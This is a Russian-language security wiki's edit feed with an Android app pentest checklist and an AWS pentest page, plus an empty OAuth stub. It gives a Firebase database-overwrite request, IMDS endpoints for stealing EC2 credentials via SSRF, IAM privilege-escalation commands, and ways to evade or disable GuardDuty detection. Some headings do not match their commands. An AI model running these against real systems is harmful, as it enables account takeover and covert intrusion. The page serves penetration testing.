InformationSecurity WIKI - Вклад участника [ru]

OAuth

2026-01-30T15:35:30Z

Drakylar:

[[Категория:Web]]

Страница посвящена OAuth и тому, как тестировать ее безопасность

= Основная информация =

== Алгоритм работы ==

=== OAuth 1.0 ===

=== OAuth 2.0 ===

= Атаки =

= Ссылки =

== Документация ==

[https://habr.com/ru/articles/77648/| Habr - Oauth 1.0]

[https://habr.com/ru/companies/vk/articles/115163/| Habr - Oauth 2.0]

== Программы ==

== Лаборатории ==

OAuth

2026-01-30T15:35:19Z

Drakylar:

[[Категория:Web]]

Страница посвящена OAuth и тому, как тестировать ее безопасность

= Основная информация =

== Алгоритм работы ==

=== OAuth 1.0 ===

=== OAuth 2.0 ===

= Атаки =

= Ссылки =

== Документация ==

[[https://habr.com/ru/articles/77648/| Habr - Oauth 1.0]]

[[https://habr.com/ru/companies/vk/articles/115163/| Habr - Oauth 2.0]]

== Программы ==

== Лаборатории ==

OAuth

2026-01-30T13:45:14Z

Drakylar: Новая страница: «Категория:Web Страница посвящена OAuth и тому, как тестировать ее безопасность = Основная…»

[[Категория:Web]]

Страница посвящена OAuth и тому, как тестировать ее безопасность

= Основная информация =

== Алгоритм работы ==

== Какие данные у Сервера авторизации ==

== Какие данные у Сервера перенаправляющего на oauth ==

= Атаки =

= Ссылки =

== Документация ==

== Программы ==

== Лаборатории ==

Категория:Web

2026-01-30T13:34:40Z

Drakylar:

Категория:Pentest

2026-01-05T12:15:08Z

Drakylar:

В данной категории рассмотрим утилиты и общие способы изучения какого-либо сервера.

* [[pentest_all|Общий план работы]]

* [[port_scan| Все о сканнировании портов]]

* [[bugbounty| Bugbounty one-lines]]

* [[honeypot_hack| Детектирование honeypot'ов]]

* [[hadoop | Apache Hadoop]]

* [[kubernetes | Kubernetes]]
** [[kubernetes_api | Kubernetes API команды]]
** [[docker_escape | Docker escape]]

* Windows
** [[amsi | AMSI]]
** [[clm | Constrained Language Mode]]
** [[applocker | AppLocker]]
** [[powershell_obfuscation| Обфускация PowerShell скрипта]]
** [[active_directory | Active Directory]]
** [[ad_windows_ldap | AD Windows - LDAP]]

* Mobile
** [[android | Android]]
** [[ios | IOS]]

* Облака
** [[aws | AWS]]

* [[brute_force| Перебор параметров (логины/пароли/директории/...)]]

* [[offline_bruteforce | Оффлайн перебор (хеши/токены)]]

https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/

Android

2024-02-18T16:16:19Z

Drakylar: /* Список проверок */

[[Категория:Pentest]]

Страница посвящена тестированию на проникновение Android-приложений.

= Этап I - получение APK =

== С устройства ==

== Из интернета ==

= Этап II - Распаковка приложения =

= Этап III - получение исходных кодов =

= Этап IV - включение отладки =

= Этап VI - патчинг =

== .smali ==

== .java ==

= Этап V - подключение frida =

= Этап VI - переупаковка приложения =

= Этап VII - добавление подписи =

= Этап VIII - сборка приложения =

= Этап IX - запуск приложения =

== На эмуляторе ==

== На устройстве ==

= Список проверок =

== Наличие обфускации ==

Как правило относится только к Java-коду но в редких случаях и к native-библиотекам.

=== Проверка ===

Для Java - достаточно посмотреть читается ли декомпилированный код или нет.

Для Native сложнее - нужно открыть ее в дизассемблере и уже смотреть статьи по обфускации кода (например добавление Virtual Machine в ассемблерный код)

=== Эксплуатация ===

Просто чтение кода и изучение используемых алгоритмов.

=== Исправление ===

Использовать бесплатные или платные(лучше) обфускаторы кода.

=== Ссылки ===

== ROOT detection ==

Определяет есть ли на устройстве рут или нет.

=== Проверка ===

Либо поиск по ключевым словам "root", "safetynet api", "play integrity" либо запуск на рутованном девайсе

Также часть решений могут детектить по работе с директориями которые по-умолчанию закрыты (например /etc/)

TODO

=== Эксплуатация ===

Отсутствует, просто best-practice

=== Исправление ===

Добавление детекта например на базе платных продуктов или Play Integrity API.

=== Ссылки ===

== Устаревший SafetyNetAPI ==

Использование устаревшего SafetyNetAPI для проверки целостности, рута и тд.

=== Проверка ===

Поиск в коде по строке "SafetyNet".

=== Эксплуатация ===

Magisc Bypass - https://github.com/kdrag0n/safetynet-fix/

Zygisk Bypass with detection evasion https://github.com/kdrag0n/safetynet-fix/issues/269

Youtube - https://www.youtube.com/watch?v=2J4QHsB5lsA

=== Исправление ===

Использовать новый Play Integrity

=== Ссылки ===

https://developer.android.com/privacy-and-security/safetynet/attestation

https://developer.android.com/privacy-and-security/safetynet/deprecation-timeline

https://developer.android.com/google/play/integrity

== Отсутствие проверки на контейнеризацию ==

Китайцы опубликовали новое решение под названием MultiApp - https://github.com/WaxMoon/MultiApp и демо-приложением https://github.com/WaxMoon/MultiAppDemo и именно это приложение легло в основу VCamera. VCamera использует "HackAPI" которое указано в "MultiApp".

Позволяет запускать другое приложение в контейнере с (как я понял) перехватом части системных вызовов, например камеры.

=== Проверка ===

Самая быстрая проверка - скачивание VCamera и тестирование с приложением https://play.google.com/store/apps/details?id=virtual.camera.app&hl=en_GB

=== Эксплуатация ===

На данный момент самое простое - VCamera и показать что камера была подменена.

=== Исправление ===

Проверки надо делать в Native-коде (С/C++ код) приложения с вызовом syscall

пример такой проверки - https://github.com/andvipgroup/VCamera/blob/f12f0b9c7131948b9369dd50aee3f3a23ab249e1/check_env_demo/code/native-lib.cpp

Почему так можно определить окружение? Как я понял, потому что хуки если и можно вешать, то не на системные функции ядра (по крайней мере без рута), поэтому вызов системных функций из Native-кода позволяет определить такую виртуализацию.

=== Ссылки ===

https://play.google.com/store/apps/details?id=virtual.camera.app&hl=en_GB

https://github.com/WaxMoon/MultiApp

https://github.com/WaxMoon/MultiAppDemo

== Секреты в коде ==

Спрятанные в коде секреты

=== Проверка ===

1. Искать самому секреты по ключевым словам

2. Использовать SemGrep для поиска секретов

3. Использовать автоматические утилиты (например, MobSF) которые ищут в тч секреты

=== Эксплуатация ===

В зависимости от полученного секрета.

=== Исправление ===

Убрать секреты из кода приложения (иногда меняя архитектуру системы).

=== Ссылки ===

== Остаточная информация ==

Поиск остаточной информации после компиляции в коде приложения.

=== Проверка ===

Что за информация может быть:

1. Private URLs

2. IP-addresses

3. Private API-endpoints

4. Полный путь компиляции (включая имя пользователя)

5. ...

Поиск опять же с SemGrep, MobSF или вручную.

=== Эксплуатация ===

Зависит от полученной информации, обычно не эксплуатируется отдельно от других уязвимостей.

=== Исправление ===

(Просто удалите если оно не требуется)

=== Ссылки ===

== Небезопасные привилегии ==

В AndroidManifest.xml есть список привилегий приложения.
Некоторые из них могут быть опасны.

=== Проверка ===

Обычно можно не мучиться и дать MobSF проверить привилегии.

JadX может распаковать AndroidManifest.xml и перевести его в читаемый формат.

=== Эксплуатация ===

В зависимости от привилегий, но как правила это просто best-practise.

=== Исправление ===

Отключение ненужных или опасных привилегий.

=== Ссылки ===

== FireBase Misconfiguration ==

Различные мисконфиги сервиса FireBase по сбору логов.

=== Проверка ===

Поиск по подстроке "firebase" - поиск firebase url.

=== Эксплуатация ===

Один из вариантов - попытаться сдампить FireBase DB.

Пример - вы нашли URL test.firebaseio.com

Попробуйте открыть test.firebaseio.com/.json - если есть бд то уязвимо.

Другой вариант - сделать PUT запрос на
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import requests
data= {"Exploit":"Successfull", "H4CKED BY": "Sheikh Rishad"}
reponse = requests.put("https://test.firebaseio.com/.json", json=data)
</syntaxhighlight>

И проверить заменились ли данные. Но! Осторожнее мб бд перезаписывает.

=== Исправление ===

TODO

=== Ссылки ===

https://cyberweapons.medium.com/misconfigured-firebase-db-on-both-android-and-web-apps-a85927e4678f

https://hackerone.com/reports/1065134

== AndroidManifest.xml - Debug ==

Включенный дебаг позволяет отладчику с ADB подключаться и отлаживать приложение.

=== Проверка ===

<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
debuggable="true"
</syntaxhighlight>

Поиск этой строки в AndroidManifest.xml

Также это можно найти автоматически с MobSF.

=== Эксплуатация ===

Обычно проще всего это сделать в AndroidStudio - выбрать устройство для отладки при открытом APK-файле.

=== Исправление ===

<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
debuggable="false"
</syntaxhighlight>

=== Ссылки ===

== AndroidManifest.xml - Backup ==

Включенная возможность бекапить приложение с настройками.

=== Проверка ===

<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
android:allowBackup="true"
</syntaxhighlight>

Поиск этой строки в AndroidManifest.xml

Также это можно найти автоматически с MobSF.

=== Эксплуатация ===

Для Samsung мб нужно будет удалить безопасное хранилище Knox.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
adb shell pm list packages -f -3
# Список приложений
...
# Замените на ссылку приложения
adb pull /data/app/org.fedorahosted.freeotp-Rbf2NWw6F-SqSKD7fZ_voQ==/base.apk freeotp.apk
</syntaxhighlight>

=== Исправление ===

<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
android:allowBackup="false"
</syntaxhighlight>

=== Ссылки ===

https://gist.github.com/AnatomicJC/e773dd55ae60ab0b2d6dd2351eb977c1

== TEST ==

Краткое_описание

=== Проверка ===

=== Эксплуатация ===

=== Исправление ===

=== Ссылки ===

== TEST ==

Краткое_описание

=== Проверка ===

=== Эксплуатация ===

=== Исправление ===

=== Ссылки ===

= Ссылки =

Android

2024-02-17T23:05:45Z

Drakylar: Новая страница: «Категория:Pentest Страница посвящена тестированию на проникновение Android-приложений. = Э…»

Ios

2024-02-17T23:00:02Z

Drakylar: Новая страница: «Категория:Pentest Страница посвящена тестированию на проникновение IOS-приложений.»

[[Категория:Pentest]]

Страница посвящена тестированию на проникновение IOS-приложений.

Категория:Pentest

2024-02-17T22:58:41Z

Drakylar:

В данной категории рассмотрим утилиты и общие способы изучения какого-либо сервера.

* [[pentest_all|Общий план работы]]

* [[port_scan| Все о сканнировании портов]]

* [[bugbounty| Bugbounty one-lines]]

* [[honeypot_hack| Детектирование honeypot'ов]]

* [[hadoop | Apache Hadoop]]

* [[kubernetes | Kubernetes]]
** [[kubernetes_api | Kubernetes API команды]]
** [[docker_escape | Docker escape]]

* Windows
** [[amsi | AMSI]]
** [[clm | Constrained Language Mode]]
** [[applocker | AppLocker]]
** [[powershell_obfuscation| Обфускация PowerShell скрипта]]
** [[active_directory | Active Directory]]

* Mobile
** [[android | Android]]
** [[ios | IOS]]

* Облака
** [[aws | AWS]]

* [[brute_force| Перебор параметров (логины/пароли/директории/...)]]

* [[offline_bruteforce | Оффлайн перебор (хеши/токены)]]

https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/

Aws

2022-10-23T11:11:53Z

Drakylar: /* Службы */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

